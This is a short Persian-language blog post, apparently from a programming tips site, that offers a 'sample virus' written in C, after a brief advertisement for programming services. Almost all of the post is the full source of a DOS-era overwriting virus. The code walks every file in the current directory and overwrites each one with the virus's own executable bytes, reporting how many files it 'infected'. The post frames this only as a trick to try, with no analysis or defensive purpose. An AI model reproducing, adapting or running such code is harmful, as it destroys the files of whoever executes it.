مارس 5, 2019 Mostafa بدون دیدگاه

اگر دنبال برنامه نویس برای ساخت افزونه ،قالب،سایت،برنامه ویندوز،اپلیکیشین اندروید،ربات تلگرام و.... هستید ،سفارش برنامه نویسی را مطالعه نمایید.

توجه : درخواست افزونه ،قالب، اسکریپت و نرم افزار و ... و سوالات و مشکلات خود را در انجمن ارسال نمایید

در این ترفند نمونه یک کد ویروس را با زبان برنامه نویسی C قرار میدهم، این ویروس ساده در هنگام اجرا شدن یک کپی از خود در فایل های دیگر ایجاد می کند پس باعث از بین رفتن فایل های دیگر می شود.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}


برچسب ها